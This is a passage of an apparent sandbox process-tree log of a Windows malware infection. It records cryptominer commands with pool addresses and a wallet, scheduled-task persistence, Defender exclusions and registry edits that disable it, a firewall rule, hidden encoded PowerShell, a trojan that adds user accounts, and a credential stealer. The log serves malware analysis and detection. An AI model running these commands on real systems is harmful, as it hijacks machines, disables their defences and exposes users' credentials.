C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3486⤵PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3526⤵PID:2228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3646⤵PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6166⤵PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6286⤵PID:6208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6646⤵PID:5640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6166⤵PID:7500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 6606⤵PID:6548
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7045⤵PID:4588
-
-
-
C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe"C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe"4⤵PID:5164
-
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --silent --allusers=04⤵PID:3916
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exeC:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6a899530,0x6a89953c,0x6a8995485⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe" --version5⤵PID:5628
-
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe"C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3916 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240110150735" --session-guid=133a7e0c-ec6f-47dc-80e1-d84f5f73be03 --server-tracking-blob=NDAxMDRkMzMyZTM1NzI5YWYyZTUyNzY5ZjY4NTZiOWM5NjkwZjY2OGE2NTZkMmJiOTVkMWZmMWZjMWUxYzNjYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNDg5OTE4OS42NTg1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4MzNkODM3Ny04N2Q3LTQwZGItYmVhOC00ZjM2NjJiYjYyNWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=58040000000000005⤵PID:5984
-
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exeC:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x69fb9530,0x69fb953c,0x69fb95486⤵PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"5⤵PID:7000
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --version5⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x250,0x254,0x258,0x20c,0x25c,0xd42614,0xd42620,0xd4262c6⤵PID:7524
-
-
-
-
C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe"C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==4⤵PID:5824
-
-
C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe"C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe"4⤵PID:7764
-
-
C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"4⤵PID:6760
-
C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp" /SL5="$30716,4472587,54272,C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"5⤵PID:7516
-
-
-
C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe"C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe"4⤵PID:5624
-
-
C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe"C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe"4⤵PID:6332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 3845⤵PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 4125⤵PID:7544
-
-
-
C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe"C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe"4⤵PID:1096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 3845⤵PID:7984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 3605⤵PID:6420
-
-
-
C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe"C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==4⤵PID:8124
-
-
C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"4⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp"C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp" /SL5="$3061C,140559,56832,C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"5⤵PID:8016
-
-
-
C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe"C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe"4⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\7zS75FC.tmp\Install.exe.\Install.exe5⤵PID:7144
-
C:\Users\Admin\AppData\Local\Temp\7zS1048.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:4584
-
-
-
-
C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe"C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe"4⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\7zSF723.tmp\Install.exe.\Install.exe5⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1A.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:6704
-
-
-
-
C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe"C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe"4⤵PID:7760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\south.exe"C:\Users\Admin\AppData\Local\Temp\Files\south.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\Files\YT.exe"C:\Users\Admin\AppData\Local\Temp\Files\YT.exe"2⤵PID:3456
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵PID:1108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC3CA.tmp.bat""3⤵PID:1584
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵PID:1668
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵PID:2504
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵PID:3920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"2⤵PID:2512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵PID:5084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:1560
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:4660
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:6124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵PID:5292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe"C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe"2⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"2⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"3⤵PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe"C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe"2⤵PID:6052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\portBrowserWebFontwin\Wpqih7cz6fMRtU.vbe"3⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\portBrowserWebFontwin\l1IRr8npYRL3m1TwDlV7BI8krChTb4.bat" "4⤵PID:3516
-
C:\portBrowserWebFontwin\componentwin.exe"C:\portBrowserWebFontwin/componentwin.exe"5⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\qemu-ga.exe'6⤵PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'6⤵PID:4700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\ShellExperienceHost.exe'6⤵PID:6960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\p5DlgEMx5gYcoGktfGFhOQrx.exe'6⤵PID:5808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\conhost.exe'6⤵PID:6948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RrF7ZgKlAD.bat"6⤵PID:6188
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1172
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:6712
-
-
C:\Recovery\WindowsRE\conhost.exe"C:\Recovery\WindowsRE\conhost.exe"7⤵PID:7916
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"2⤵PID:5400
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E83.tmp\6E84.tmp\6E85.bat C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"3⤵PID:4900
-
C:\Windows\system32\calc.execalc4⤵PID:5292
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:4404
-
-
C:\Windows\explorer.exeexplorer4⤵PID:5496
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:5836
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:5412
-
-
C:\Windows\system32\mspaint.exemspaint4⤵PID:6120
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:6108
-
-
C:\Windows\system32\write.exewrite4⤵PID:6248
-
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"5⤵PID:6616
-
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:7072
-
-
C:\Windows\system32\write.exewrite4⤵PID:3168
-
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"5⤵PID:4656
-
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:7204
-
-
C:\Windows\system32\write.exewrite4⤵PID:5720
-
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"5⤵PID:1168
-
-
-
C:\Windows\system32\msg.exemsg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel4⤵PID:7852
-
-
C:\Windows\system32\control.execontrol4⤵PID:6276
-
-
C:\Windows\system32\net.exenet user DANIEL TROJAN /add4⤵PID:7440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user DANIEL TROJAN /add5⤵PID:6952
-
-
-
C:\Windows\system32\net.exenet user 4054 /add4⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 4054 /add5⤵PID:428
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\route.exe"C:\Users\Admin\AppData\Local\Temp\Files\route.exe"2⤵PID:4016
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe"3⤵PID:352
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat" "4⤵PID:5416
-
C:\hypersavesIntoRuntime\savesinto.exe"C:\hypersavesIntoRuntime\savesinto.exe"5⤵PID:5948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵PID:5312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵PID:5292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵PID:5952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵PID:2076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/portBrowserWebFontwin/'6⤵PID:5524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵PID:5816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/hypersavesIntoRuntime/'6⤵PID:6124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵PID:6092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵PID:4832
-
-
C:\Windows\it-IT\wscript.exe"C:\Windows\it-IT\wscript.exe"6⤵PID:6176
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c8f9d8a9-4875-475d-98b1-691b432f278e.vbs"7⤵PID:7120
-
C:\Windows\it-IT\wscript.exeC:\Windows\it-IT\wscript.exe8⤵PID:4160
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c963dd6f-5a58-462d-95df-8f0eafca22c1.vbs"7⤵PID:6500
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"2⤵PID:8092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"2⤵PID:5896
-
-
C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp"C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp" /SL5="$202E4,4469003,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2880
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:536 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p workwork -a rx/0 -k --max-cpu-usage=503⤵PID:2976
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp"C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp" /SL5="$2038A,4472587,54272,C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"1⤵PID:4296
-
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe"C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -i2⤵PID:1784
-
-
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe"C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -s2⤵PID:1252
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 11022⤵PID:2284
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 11021⤵PID:5064
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:4676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:824
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:2340
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)1⤵PID:5084
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:316
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:3620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4016
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4344
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4856
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:436
-
C:\Windows\system32\timeout.exetimeout 31⤵
- Delays execution with timeout.exe
PID:2384
-
C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exeC:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe pA /gDsite_idWIs 385118 /S1⤵PID:4608
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f 